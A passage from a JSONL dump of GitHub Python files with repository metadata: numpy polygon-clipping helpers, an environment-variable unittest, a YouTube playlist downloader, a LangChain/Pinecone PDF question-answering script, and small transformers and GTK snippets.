p_[pl] = np.concatenate((p_[pl], x[None, :]), axis=0)\r\n for cnt, p in enumerate(p_):\r\n if len(p) > 2:\r\n p_[cnt] = _srt_pnts_(p)\r\n for cnt, c in enumerate(c_):\r\n if len(c) > 2:\r\n c_[cnt] = _srt_pnts_(c)\r\n return p_, c_\r\n\r\n\r\ndef _del_seq_pnts_(arr, poly=True):\r\n \"\"\"Remove sequential duplicates in a Nx2 array of points.\r\n\r\n Parameters\r\n ----------\r\n arr : array_like\r\n An Nx2 of point coordinates.\r\n poly : boolean\r\n True if the points originate from a polygon boundary, False otherwise.\r\n\r\n Notes\r\n -----\r\n This largely based on numpy.arraysetops functions `unique` and `_unique1d`.\r\n See the reference link in the script header.\r\n\r\n The method entails viewing the 2d array as a structured 1d array, then\r\n checking whether sequential values are equal. In np.unique, the values\r\n are initially sorted to determine overall uniqueness, not sequential\r\n uniqueness.\r\n\r\n See Also\r\n --------\r\n `uniq_2d` above, which can be used in situations where you genuine\r\n uniqueness is desired.\r\n \"\"\"\r\n # -- like np.unique but not sorted\r\n shp_in, dt_in = arr.shape, arr.dtype\r\n # arr = np.ascontiguousarray(arr)\r\n dt = [(f'f{i}', dt_in) for i in range(arr.shape[1])]\r\n tmp = arr.view(dt).squeeze() # -- view data and reshape to (N,)\r\n # -- mask and check for sequential equality.\r\n mask = np.empty((shp_in[0],), np.bool_)\r\n mask[0] = True\r\n mask[1:] = tmp[:-1] != tmp[1:]\r\n # wh_ = np.nonzero(mask)[0]\r\n # sub_arrays = np.array_split(arr, wh_[wh_ > 0])\r\n tmp = arr[mask] # -- slice the original array sequentially unique points\r\n if poly: # -- polygon source check\r\n if (tmp[0] != tmp[-1]).all(-1):\r\n arr = np.concatenate((tmp, tmp[0, None]), axis=0)\r\n return arr\r\n return tmp\r\n\r\n\r\ndef _roll_(arrs):\r\n \"\"\"Roll point coordinates to a new starting position.\r\n\r\n Parameters\r\n ----------\r\n arrs : list of Geo arrays or ndarrays. Two arrays are expected.\r\n\r\n Notes\r\n -----\r\n Rolls the coordinates of the Geo array or ndarray to put the start/end\r\n points as close to the lower-left of the ring extent as possible.\r\n\r\n If a single array is passed, a single array is returned otherwise a list\r\n of arrays.\r\n \"\"\"\r\n # --\r\n if not isinstance(arrs, (list, tuple)):\r\n arrs = [arrs]\r\n out = []\r\n for ar in arrs:\r\n chk = npg.is_Geo(ar)\r\n if chk:\r\n out.append(npg.roll_coords(ar))\r\n else:\r\n out.append(roll_arrays(ar))\r\n return out\r\n\r\n\r\n# ---- (2) prepare for boolean operations\r\n#\r\ndef _w_(a, b, all_info):\r\n \"\"\"Return winding number and other values.\"\"\"\r\n x0, y0 = a[:-1].T # point `from` coordinates\r\n # x1, y1 = a[1:].T # point `to` coordinates\r\n x1_x0, y1_y0 = (a[1:] - a[:-1]).T\r\n #\r\n x2, y2 = b[:-1].T # clip polygon `from` coordinates\r\n x3, y3 = b[1:].T # clip polygon `to` coordinates\r\n x3_x2, y3_y2 = (b[1:] - b[:-1]).T\r\n # reshape poly deltas\r\n x3_x2 = x3_x2[:, None]\r\n y3_y2 = y3_y2[:, None]\r\n # deltas between pnts/poly x and y\r\n x0_x2 = x0 - x2[:, None]\r\n y0_y2 = y0 - y2[:, None]\r\n #\r\n a_0 = y0_y2 * x3_x2\r\n a_1 = y3_y2 * x0_x2\r\n b_0 = y0_y2 * x1_x0\r\n b_1 = y1_y0 * x0_x2\r\n #\r\n a_num = (a_0 - a_1) + 0.0 # signed distance diff_ in npg.pip.wn_np\r\n b_num = (b_0 - b_1) + 0.0\r\n #\r\n # pnts in poly\r\n chk1 = (y0_y2 >= 0.0) # y above poly's first y value, per segment\r\n chk2 = np.less(y0, y3[:, None]) # y above the poly's second point\r\n chk3 = np.sign(a_num).astype(np.int32)\r\n pos = (chk1 & chk2 & (chk3 > 0)).sum(axis=0, dtype=np.int32)\r\n neg = (~chk1 & ~chk2 & (chk3 < 0)).sum(axis=0, dtype=np.int32)\r\n wn_vals = pos - neg\r\n wn_ = np.concatenate((wn_vals, np.array([wn_vals[0]])))\r\n #\r\n if all_info: # denom of determinant\r\n denom = (x1_x0 * y3_y2) - (y1_y0 * x3_x2) + 0.0\r\n return wn_, denom, x0, y0, x1_x0, y1_y0, a_num, b_num\r\n return wn_\r\n\r\n\r\ndef _wn_clip_(pnts, poly, all_info=True):\r\n \"\"\"Return points in a polygon or on its perimeter, using `winding number`.\r\n\r\n Information required to determine intersection points is also provided.\r\n These data are used for clipping the polygon represented by `pnts` by the\r\n clipping polygon `poly`.\r\n\r\n Parameters\r\n ----------\r\n pnts, poly : array_like\r\n Geometries represent the points and polygons. `pnts` is assumed to be\r\n the polygon being clipped and `poly` is the clipping polygon.\r\n all_info : boolean\r\n True, returns points in polygons, the in and out id values, the\r\n crossing type and winding number. False, simply returns the winding\r\n number, with 0 being outside points and -1 being inside points for a\r\n clockwise-oriented polygon.\r\n\r\n Notes\r\n -----\r\n Negative and positive zero np.NZERO, np.PZERO == 0.0.\r\n `The denominator of this expression is the (squared) distance between\r\n P1 and P2. The numerator is twice the area of the triangle with its\r\n vertices at the three points, (x0, y0), p1 and p2.` Wikipedia\r\n With p1, p2 defining a line and x0,y0 a point.\r\n\r\n Other\r\n -----\r\n z = np.asarray(np.nonzero(npg.eucl_dist(a, b) == 0.)).T\r\n a[z[:, 0]] and b[z[:, 1]] return the points from both arrays that have a\r\n distance of 0.0 and they intersect.\r\n \"\"\"\r\n\r\n def _xsect_(a_num, b_num, denom, x1_x0, y1_y0, x0, y0):\r\n \"\"\"Return the intersections and their id values.\"\"\"\r\n with np.errstate(all=\"ignore\"): # ignore all errors\r\n u_a = (a_num / denom) + 0.0\r\n u_b = (b_num / denom) + 0.0\r\n z0 = np.logical_and(u_a >= 0., u_a <= 1.) # np.isfinite(u_a)`\r\n z1 = np.logical_and(u_b >= 0., u_b <= 1.) # np.isfinite(u_b)\r\n both = (z0 & z1)\r\n xs = (u_a * x1_x0 + x0)[both]\r\n ys = (u_a * y1_y0 + y0)[both]\r\n x_pnts = []\r\n if xs.size > 0:\r\n x_pnts = np.concatenate((xs[:, None], ys[:, None]), axis=1)\r\n whr = np.array(np.nonzero(both)).T\r\n return whr, x_pnts\r\n # --\r\n # Use `_w_` and `_xsect_` to determine pnts in poly\r\n wn_, denom, x0, y0, x1_x0, y1_y0, a_num, b_num = _w_(pnts, poly, True)\r\n whr, x_pnts = _xsect_(a_num, b_num, denom, x1_x0, y1_y0, x0, y0)\r\n p_in_c = np.nonzero(wn_)[0]\r\n # p_out_c = np.nonzero(wn_ + 1)[0]\r\n x_type = np.concatenate((wn_[:-1, None], wn_[1:, None]), axis=1)\r\n # --\r\n # Use `_w_` and `_xsect_` to determine poly pnts in pnts (as polygon)\r\n wn2_ = _w_(poly, pnts, False)\r\n c_in_p = np.nonzero(wn2_)[0]\r\n # c_out_p = np.nonzero(wn2_ + 1)[0]\r\n vals = [x_pnts, p_in_c, c_in_p, x_type, whr]\r\n # if ..outs needed [x_pnts, p_in_c, c_in_p, c_out_p, ...wn_, whr]\r\n if all_info:\r\n return vals\r\n return whr # wn_\r\n\r\n\r\ndef _node_type_(p_in_c, c_in_p, poly, clp, x_pnts):\r\n \"\"\"Return node intersection data. clipper polygon intersection`.\r\n\r\n Parameters\r\n ----------\r\n p_in_c, c_in_p : lists\r\n Id values of points in poly and clipper respectively.\r\n clp, poly : array_like\r\n The geometry of the clipper and the polygon being clipped.\r\n x_pnts : array_like\r\n The intersection points of the geometry edges.\r\n\r\n Returns\r\n -------\r\n - p_in_c : polygon points in clipper and reverse\r\n - c_in_p : clipper points in polygon and those that are equal\r\n - c_eq_p, p_eq_c : clipper/polygon equality\r\n - c_eq_x, p_eq_x : intersection points equality checks for both geometries\r\n - cp_eq, cx_eq, px_eq : clipper, polygon and intersection equivalents\r\n\r\n Notes\r\n -----\r\n Forming a dictionary for cp_eq, cs_eq, px_eq::\r\n\r\n kys = uniq_1d(px_eq[:, 0]).tolist() # [ 0, 2, 3, 4, 12]\r\n dc = {} # -- dictionary\r\n dc[0] = px_eq[px_eq[:, 0] == 0][:,1].tolist()\r\n for k in kys:\r\n dc[k] = px_eq[px_eq[:, 0] == k][:,1].tolist()\r\n dc\r\n {0: [0, 3, 13, 14],\r\n 2: [7, 8],\r\n 3: [9, 10, 11],\r\n 4: [1, 2, 5, 6],\r\n 12: [0, 3, 13, 14]}\r\n\r\n Or, you can split the array::\r\n\r\n whr = np.nonzero(np.diff(cx_eq[:, 0]))[0] + 1\r\n np.array_split(cx_eq, whr)\r\n [array([[ 0, 0],\r\n [ 0, 3],\r\n [ 0, 13],\r\n [ 0, 14]], dtype=int64),\r\n array([[1, 1],\r\n [1, 2],\r\n [1, 5],\r\n [1, 6]], dtype=int64),\r\n array([[2, 4]], dtype=int64),\r\n array([[3, 7],\r\n [3, 8]], dtype=int64),\r\n array([[ 4, 9],\r\n [ 4, 10],\r\n [ 4, 11]], dtype=int64),\r\n array([[ 6, 0],\r\n [ 6, 3],\r\n [ 6, 13],\r\n [ 6, 14]], dtype=int64)]\r\n\r\n # -- Point equality check. -- c_eq_p, c_eq_x, p_eq_c, p_eq_x\r\n # poly[p_eq_c], poly[p_eq_x] and clp[c_eq_p], clp[c_eq_x]\r\n \"\"\"\r\n # -- defaults\r\n px_in_c = []\r\n cx_in_p = []\r\n # -- checks\r\n # poly/clp, poly/x_pnts, clp/x_pnts equalities\r\n c_eq_p, p_eq_c = np.nonzero((poly == clp[:, None]).all(-1))\r\n p_eq_x, _ = np.nonzero((x_pnts == poly[:, None]).all(-1))\r\n c_eq_x, _ = np.nonzero((x_pnts == clp[:, None]).all(-1))\r\n # -- check equality\r\n c_eq_p = sorted(list(set(c_eq_p))) if len(c_eq_p) > 0 else []\r\n p_eq_c = sorted(list(set(p_eq_c))) if len(p_eq_c) > 0 else []\r\n p_eq_x = sorted(list(set(p_eq_x))) if len(p_eq_x) > 0 else []\r\n c_eq_x = sorted(list(set(c_eq_x))) if len(c_eq_x) > 0 else []\r\n # -- build the output\r\n p_in_c = list(set(p_in_c))\r\n c_in_p = list(set(c_in_p))\r\n if p_eq_c or p_eq_x: # -- non-empty lists check\r\n # p_in_c = reduce(np.union1d, [p_in_c, p_eq_c, p_eq_x]) # slow equiv.\r\n px_in_c = sorted(list(set(p_in_c + p_eq_c + p_eq_x)))\r\n if c_eq_p or c_eq_x: # c_in_p + (p_eq_c, c_eq_x)\r\n cx_in_p = sorted(list(set(c_in_p + c_eq_p + c_eq_x)))\r\n return px_in_c, p_in_c, p_eq_c, p_eq_x, cx_in_p, c_in_p, c_eq_p, c_eq_x\r\n\r\n\r\ndef prep_overlay(arrs, roll=True, polygons=[True, True]):\r\n \"\"\"Prepare arrays for overlay analysis.\r\n\r\n Parameters\r\n ----------\r\n arrs : list/tuple\r\n The first geometry is the one being acted upon and the second is the\r\n one being used to overlay the first for operations such as clipping,\r\n splitting, intersection.\r\n polygons : list/tuple\r\n True, the input geometry is a polygon, False otherwise.\r\n Some operations permit polygon and polyline inputs, so you can alter\r\n\r\n Requires\r\n --------\r\n This script compiles the common functions::\r\n\r\n - `roll_arrays` (optional)\r\n - `_wn_clip_`\r\n - `_node_type_`\r\n - `_add_pnts_`\r\n - `_del_seq_pnts_`\r\n\r\n Returns\r\n -------\r\n The following are returned::\r\n\r\n - x_pnts : intersection points\r\n - a0, a1 : arrays rolled to first intersection,\r\n - a0_new, a1_new : rolled with intersections added on,\r\n - args : optional arguments\r\n - px_in_c, cx_in_p : poly/intersection in c and clip/intersection in p\r\n - p_in_c, c_in_p : poly in clip, clip in poly\r\n - c_eq_p, c_eq_x : clip equals poly or intersection\r\n - p_eq_c, p_eq_x : poly equals clip or intersection\r\n\r\n Notes\r\n -----\r\n The sequence is as follows::\r\n\r\n - Roll the arrays so that their first coordinate is the closest\r\n to the lower left of the geometry extent.\r\n - Determine points inside each other`s geometry.\r\n - Classify the points.\r\n - Add intersection points to both geometries.\r\n - Delete sequential duplicates if any exist.\r\n \"\"\"\r\n #\r\n # -- roll towards LL. `_wn_clp_` gets pnts inside, on, outside each other\r\n if len(arrs) != 2:\r\n print(\"Two poly* type geometries expected.\")\r\n # return None\r\n a0, a1 = arrs\r\n is_0, is_1 = polygons\r\n if roll:\r\n a0, a1 = _roll_(arrs)\r\n vals = _wn_clip_(a0, a1, all_info=True)\r\n x_pnts, pInc, cInp, x_type, whr = vals\r\n args = _node_type_(pInc, cInp, a0, a1, x_pnts)\r\n # px_in_c, cx_in_p, p_in_c, c_in_p, c_eq_p, c_eq_x, p_eq_c, p_eq_x = args\r\n a0_new, a1_new = _add_pnts_(a0, a1, x_pnts, whr)\r\n x_pnts = _del_seq_pnts_(x_pnts, poly=False)\r\n a0_new = _del_seq_pnts_(np.concatenate((a0_new), axis=0), poly=is_0)\r\n a1_new = _del_seq_pnts_(np.concatenate((a1_new), axis=0), poly=is_1)\r\n return x_pnts, a0, a1, a0_new, a1_new, args\r\n\r\n\r\n# ---- (3) add intersection points\r\n#\r\ndef add_intersections(\r\n p0, p1, roll_to_minX=True, polygons=[True, True], class_ids=True):\r\n \"\"\"Return input polygons with intersections points added.\r\n\r\n Parameters\r\n ----------\r\n p0, p1 : array_like\r\n The overlapping poly features.\r\n polygons : list/tuple\r\n True, the input geometry is a polygon feature, False, for polyline.\r\n Some operations permit polygon and polyline inputs, so you can alter\r\n `polygons=[True, False]` if the first is a polygon and the second a\r\n polyline.\r\n roll_to_minX : boolean\r\n Select the intersection point with the minimum x-value. This is used\r\n to roll the arrays.\r\n class_id : boolean\r\n Return Pout, Pin, Cout, Cin if True. These are the indices of the\r\n points that are in or out of their respective counterpart.\r\n\r\n Requires\r\n --------\r\n `_add_pnts_`, `_del_seq_pnts_`, `_w_`, `_wn_clip_`\r\n _add_pnts_(p0, p1, x_pnts, whr)\r\n\r\n Returns\r\n -------\r\n The poly features rotated to the first intersection point (`p0_n, p1_n`),\r\n their respective indices from the start (`id_01`) and the intersection\r\n points (`x_pnts`), and the classified indices for each polygon as to\r\n whether the points are outside, on or inside the other\r\n\r\n p0_n, p1_n : arrays\r\n The input arrays, rotated to their first intersection point and those\r\n points added to their perimeter.\r\n\r\n x_pnts : array\r\n The intersection points with sequential duplicates removed.\r\n\r\n id_plcl : array\r\n Where the polygons intersect with p0, p1 representing the ids in their\r\n respective column. By convention, `poly` and `clip` is the order of\r\n the indices (eg. `plcl`).\r\n\r\n p0_ioo, p1_ioo : arrays\r\n Poly id values and whether the point is outside the other (-1), an\r\n intersection point on the boundary (0) or inside the other polygon (1).\r\n\r\n Example\r\n -------\r\n Outside and inside ids are determined using `in_out_on`.\r\n Using `E` and `d0_` as `p0_` and `p1_`::\r\n\r\n w0 = np.nonzero(p0_ioo[:, 1] <= 0)[0] # outside and on\r\n Pout = p0_n[w0]\r\n w1 = np.nonzero(p1_ioo[:, 1] >= 0)[0] # inside and on\r\n Pin = p1_n[w1]\r\n z0_id, z1_id = np.nonzero((z0 == z1[:, None]).all(-1))\r\n id_s10 = np.concatenate((z0_id[:, None], z1_id[:, None]), axis=1) # or\r\n id_s01 = np.concatenate((z1_id[:, None], z0_id[:, None]), axis=1)\r\n id_s01srt = id_s01[np.argsort(id_s01[:, 0])]\r\n plot_polygons([z0, z1])\r\n \"\"\"\r\n def _classify_(p0_, p1_, id_):\r\n \"\"\"Return poly points classified as inside, on or outside.\"\"\"\r\n p_ids = np.arange(0, p0_.shape[0])\r\n p_neq = sorted(list(set(p_ids).difference(set(id_))))\r\n p_neq = np.array(p_neq) # convert to array\r\n z = p0_[p_neq] # check the points not on, but may be in or out\r\n p_w = _w_(z, p1_, False) # use _w_ from _wn_clip_\r\n p_i = np.nonzero(p_w)[0]\r\n p_o = np.nonzero(p_w + 1)[0]\r\n p_in = p_neq[p_i] # in ids\r\n p_out = p_neq[p_o] # out ids\r\n p_ioo = np.zeros(p0_.shape, dtype='int') # create the output indices\r\n p_ioo[:, 0] = p_ids # p0 ids (i)n (o)ut (o)n -> ``ioo``\r\n p_ioo[p_in, 1] = 1\r\n p_ioo[p_out, 1] = -1\r\n return p_ioo\r\n\r\n def in_out_on(w0, p_sze):\r\n \"\"\"Return the array indices as lists.\"\"\"\r\n if w0.size == 0:\r\n # print(\"Empty array.\")\r\n return []\r\n elif len(w0) == 1: # 2023-05-07\r\n val = w0.tolist()[0]\r\n vals = [val - 1, val, val + 1] if val > 0 else [val, val + 1]\r\n return vals\r\n out = []\r\n sub = [w0[0] - 1, w0[0]]\r\n for cnt, i in enumerate(w0[1:], 0):\r\n prev = w0[cnt]\r\n if i - prev == 1:\r\n sub.append(i)\r\n else:\r\n sub.append(prev + 1)\r\n out.append(sub)\r\n sub = [i - 1, i]\r\n if cnt == len(w0) - 2:\r\n if len(sub) >= 2 and p_sze not in sub:\r\n add_ = min(p_sze, i + 1)\r\n sub.append(add_)\r\n out.append(sub)\r\n return out\r\n # --\r\n #\r\n is_0, is_1 = polygons\r\n vals = _wn_clip_(p0, p1, all_info=True)\r\n x_pnts, pInc, cInp, x_type, whr = vals\r\n p0_n, p1_n = _add_pnts_(p0, p1, x_pnts, whr)\r\n p0_n = _del_seq_pnts_(np.concatenate((p0_n), axis=0), poly=is_0)\r\n p1_n = _del_seq_pnts_(np.concatenate((p1_n), axis=0), poly=is_1)\r\n x_pnts = _del_seq_pnts_(x_pnts, False) # True, if wanting a polygon\r\n # -- locate the roll coordinates\r\n if roll_to_minX:\r\n w = np.argsort(x_pnts[:, 0])[0] # sort and slice is quickest\r\n xp = x_pnts[w]\r\n else:\r\n xp = x_pnts\r\n r0 = np.nonzero((xp == p0_n[:, None]).all(-1).any(-1))[0]\r\n r1 = np.nonzero((xp == p1_n[:, None]).all(-1).any(-1))[0]\r\n v0, v1 = r0[0], r1[0]\r\n p0_n = np.concatenate((p0_n[v0:-1], p0_n[:v0], [p0_n[v0]]), axis=0)\r\n p1_n = np.concatenate((p1_n[v1:-1], p1_n[:v1], [p1_n[v1]]), axis=0)\r\n # -- fix the id pairing\r\n p0N = len(p0_n) - 1\r\n p1N = len(p1_n) - 1\r\n id0, id1 = np.nonzero((p1_n == p0_n[:, None]).all(-1))\r\n whr0 = np.nonzero(id0 == p0N)[0]\r\n whr1 = np.nonzero(id1 == p1N)[0]\r\n id0[whr0] = 0\r\n id1[whr1] = 0 # slice off the first and last\r\n id_plcl = np.concatenate((id0[:, None], id1[:, None]), axis=1)[1:-1]\r\n id_plcl[-1] = [p0N, p1N] # make sure the last entry is < shape[0]\r\n #\r\n if class_ids:\r\n p0_ioo = _classify_(p0_n, p1_n, id0) # poly\r\n p1_ioo = _classify_(p1_n, p0_n, id1) # clipper\r\n w0 = p0_ioo[p0_ioo[:, 1] < 0, 0] # slice where p0_ioo < 0\r\n w1 = p0_ioo[p0_ioo[:, 1] > 0, 0] # slice where p0_ioo > 0\r\n w2 = p1_ioo[p1_ioo[:, 1] < 0, 0] # slice where p1_ioo < 0\r\n w3 = p1_ioo[p1_ioo[:, 1] > 0, 0] # slice where p1_ioo > 0\r\n p0_sze = p0_n.shape[0] - 1\r\n p1_sze = p1_n.shape[0] - 1\r\n Pout = in_out_on(w0, p0_sze) # poly outside clip\r\n Pin = in_out_on(w1, p0_sze) # poly inside clip\r\n Cout = in_out_on(w2, p1_sze) # clip outside poly\r\n Cin = in_out_on(w3, p1_sze) # clip inside poly\r\n # -- NOTE\r\n # -- id_plcl are the poly, clp point ids equal to x_pnts\r\n return p0_n, p1_n, id_plcl, x_pnts, Pout, Pin, Cout, Cin\r\n return p0_n, p1_n, id_plcl, x_pnts # p0_ioo, p1_ioo\r\n\r\n\r\n# ---- (4) extras\r\n#\r\ndef prePC(i0_, i1_, cN, j0_, j1_, pN, pinside, cinside):\r\n \"\"\"Determine pre `p` and `c` points.\"\"\"\r\n preP, preC = [], []\r\n i1_ = 0 if i1_ in [i1_, cN] else i1_ # clp first/last point check\r\n j1_ = 0 if j1_ in [j1_, pN] else j1_ # poly first/last point check\r\n #\r\n # -- add preceeding pinside points\r\n if j0_ > 0 and j1_ < j0_:\r\n preP = [m for m in range(j1_, j0_ + 1) if m in pinside]\r\n # -- add preceeding cinside points\r\n if i0_ > 0 and i1_ < i0_:\r\n preC = [m for m in range(i1_, i0_ + 1) if m in cinside]\r\n return preP, preC\r\n\r\n\r\ndef postPC(inC_0, cN, inP_0, pN, cinside, pinside):\r\n \"\"\"Determine pre `p` and `c` points.\"\"\"\r\n preC, preP = [], []\r\n # -- add trailing cinside points\r\n if inC_0 != 0:\r\n preC = [m for m in range(inC_0, cN + 1) if m in cinside]\r\n # -- add trailing pinside points\r\n if inP_0 != 0:\r\n\r\n preP = [m for m in range(inP_0, pN + 1) if m in pinside]\r\n return preC, preP\r\n\r\n\r\n# ---- Final main section ----------------------------------------------------\r\nif __name__ == \"__main__\":\r\n \"\"\"optional location for parameters\"\"\"\r\n print(f\"\\nRunning... {script}\\n\")\r\n","repo_name":"Dan-Patterson/numpy_geometry","sub_path":"arcpro_npg/npg/npg/npg_bool_hlp.py","file_name":"npg_bool_hlp.py","file_ext":"py","file_size_in_byte":23057,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"3907004730","text":"import unittest\nfrom modules.utils import *\n\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_get_env_or_default_returns_default_value_for_nonexisting_env(self):\n default = \"DEFAULT\"\n result = get_env_or_default(\"this env var does not exist\", \"DEFAULT\")\n self.assertEqual(result, default)\n\n def test_get_env_or_default_returns_env_var(self):\n default = \"DEFAULT\"\n expected = \"EXPECTED_CONTENT\"\n var_name = \"VARNAME_FOR_TEST\"\n os.environ[var_name] = expected\n result = get_env_or_default(var_name, default)\n self.assertEqual(expected, result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"danielpaulus/python_restapi_with_flask","sub_path":"modules/utils/test_env.py","file_name":"test_env.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40749290457","text":"# Importing libraries\n#Programa para descargar\n# de youtube una lista de\n# reproducción completa\n\n#Para evitar errores en la compilación se necesita\n#pip uninstall PyQt5\n#pip uninstall PyQt5-sip\n#pip uninstall PyQtWebEngine\n\n\nimport bs4 as bs\nimport sys\nimport threading\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtCore import QUrl\nimport pytube\n\ndown = 0\ndesc = 0\nclass Page(QWebEnginePage):\n def __init__(self, url):\n self.app = QApplication(sys.argv)\n QWebEnginePage.__init__(self)\n self.html = ''\n self.loadFinished.connect(self._on_load_finished)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _on_load_finished(self):\n self.html = self.toHtml(self.Callable)\n print('Conectado :3')\n\n def Callable(self, html_str):\n self.html = html_str\n self.app.quit()\n\n\nlinks = []\n\n\ndef exact_link(link):\n vid_id = link.split('=')\n # print(vid_id)\n str = \"\"\n for i in vid_id[0:2]:\n str += i + \"=\"\n\n str_new = str[0:len(str) - 1]\n index = str_new.find(\"&\")\n\n new_link = \"https://www.youtube.com\" + str_new[0:index]\n return new_link\n\ndef DownHilos(link):\n global down\n down += 1\n video = pytube.YouTube(link)\n print(\"Descargando \" + video.title)\n video.streams.filter(progressive=True, file_extension='mp4').order_by('resolution').desc().first().download()\n down -= 1\n return\n\nurl = input(\"Ingresa el link de tu playlist plox :v\")\ndesc = int(input(\"Ingresa un numero de descargas simultaneas\"))\n# Scraping and extracting the video\n# links from the given playlist url\npage = Page(url)\ncount = 0\n\nsoup = bs.BeautifulSoup(page.html, 'html.parser')\n\nfor link in soup.find_all('a', id='thumbnail'):\n # not using first link because it is\n # playlist link not particular video link\n if count == 0:\n count += 1\n continue\n else:\n try:\n vid_src = link['href']\n except KeyError:\n print(\"Terminando Descargas....\")\n continue\n #print(vid_src)\n # keeping the format of link to be\n # given to pytube otherwise in some cases\n new_link = exact_link(vid_src)\n while(down >= desc):\n continue\n threading.Thread(target=DownHilos,args=(new_link,)).start()\nprint(\"Gracias por volar con aereopinguino, que tenga un buen día\")","repo_name":"ThunderGer23/ProgramasPythonQueSalvanVidas","sub_path":"DownloadPlayListYoutube.py","file_name":"DownloadPlayListYoutube.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27499827355","text":"import os\nimport pickle\nimport pinecone\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.vectorstores import Pinecone\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.llms import OpenAI\nfrom langchain.chains.question_answering import load_qa_chain\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nOPENAI_API_KEY = os.getenv('OPENAI_API_KEY')\nPINECONE_API_KEY = os.getenv('PINECONE_API_KEY')\nPINECONE_API_ENV = os.getenv('PINECONE_API_ENV')\n\n\ndef read_pdf_data(file_path):\n loader = PyPDFLoader(file_path)\n return loader.load()\n\n\ndef get_text_splits(data):\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n return text_splitter.split_documents(data)\n\n\ndef get_embeddings(api_key, local_file='embeddings.pkl'):\n # Check if embeddings exist locally\n if os.path.exists(local_file):\n print(\"Loading embeddings from local file...\")\n with open(local_file, 'rb') as f:\n embeddings = pickle.load(f)\n else:\n embeddings = OpenAIEmbeddings(openai_api_key=api_key)\n # Save embeddings to a local file\n with open(local_file, 'wb') as f:\n pickle.dump(embeddings, f)\n return embeddings\n\n\ndef upload_to_pinecone(texts, embeddings, index_name):\n pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_API_ENV)\n return Pinecone.from_texts([t.page_content for t in texts], embeddings, index_name=index_name)\n\n\ndef search_documents(docsearch, query):\n return docsearch.similarity_search(query)\n\n\ndef question_answering(llm, docs, prompt):\n chain = load_qa_chain(llm, chain_type=\"stuff\")\n return chain.run(input_documents=docs, question=prompt)\n\n\ndef main():\n # Read data from PDF\n data = read_pdf_data(\"./english_vachanamrut.pdf\")\n\n # Get text splits\n texts = get_text_splits(data)\n\n # Generate embeddings\n embeddings = get_embeddings(OPENAI_API_KEY)\n\n # Upload to Pinecone\n pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_API_ENV)\n # pinecone.create_index(\"yogi\", dimension=1536, metric=\"cosine\")\n # docsearch = upload_to_pinecone(texts, embeddings, \"yogi\")\n docsearch = Pinecone.from_existing_index(\"yogi\", embeddings)\n\n # Search documents\n query = \"What are the three levels of vairagya?\"\n docs = search_documents(docsearch, query)\n\n # Question Answering\n llm = OpenAI(temperature=0, openai_api_key=OPENAI_API_KEY)\n answer = question_answering(llm, docs, query)\n\n print(answer)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"darshan-hindocha/vachanamrut-study","sub_path":"data/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34365417511","text":"def factorial(num =12):\r\n if (num < 0):\r\n return None\r\n elif (num == 0 or num ==1):\r\n return 1\r\n else:\r\n fact =1\r\n for i in range(2,num+1):\r\n fact = fact *i\r\n return fact\r\n","repo_name":"anjan111/Python","sub_path":"Rohith_Batch/module/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"15253056286","text":"from transformers import pipeline\n\ncamebert_fill_mask = pipeline(\"fill-mask\", model=\"camembert-base\")\nresults = camebert_fill_mask(\"Le camembert est :)\")\nprint(results)\n\n# [{'score': 0.49091100692749023, 'token': 7200, 'token_str': 'délicieux', 'sequence': 'Le camembert est délicieux :)'},\n# {'score': 0.10556945204734802, 'token': 2183, 'token_str': 'excellent', 'sequence': 'Le camembert est excellent :)'},\n# {'score': 0.03453319892287254, 'token': 26202, 'token_str': 'succulent', 'sequence': 'Le camembert est succulent :)'},\n# {'score': 0.03303125500679016, 'token': 528, 'token_str': 'meilleur', 'sequence': 'Le camembert est meilleur :)'},\n# {'score': 0.03007635846734047, 'token': 1654, 'token_str': 'parfait', 'sequence': 'Le camembert est parfait :)'}]\n'''\nfrom transformers import CamembertTokenizer, CamembertForMaskedLM\ntokenizer = CamembertTokenizer.from_pretrained(\"camembert-base\")\nmodel = CamembertForMaskedLM.from_pretrained(\"camembert-base\")\n'''\n\n# 更好的方式,使用 Auto*classes\n\nfrom transformers import AutoTokenizer, AutoModelForMaskedLM\n\ntokenizer = AutoTokenizer.from_pretrained(\"camembert-base\")\nmodel = AutoModelForMaskedLM.from_pretrained(\"camembert-base\")","repo_name":"Will-learning-nlp/ITLS_homework","sub_path":"transformers_练习代码/11_使用预训练模型.py","file_name":"11_使用预训练模型.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3462853537","text":"import gi\ntry:\n gi.require_version('Gtk', '3.0')\n gi.require_version('Gdk', '3.0')\n gi.require_version('Gio', '2.0')\n gi.require_version('GLib', '2.0')\n gi.require_version('GObject', '2.0')\n gi.require_version('GdkPixbuf', '2.0')\n gi.require_version('Notify', '0.7')\nexcept Exception as e:\n print(e)\n exit(1)\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import Gio\nfrom gi.repository import GLib\nfrom gi.repository import GObject\nfrom gi.repository import Notify\nimport os\nfrom dbus.mainloop.glib import 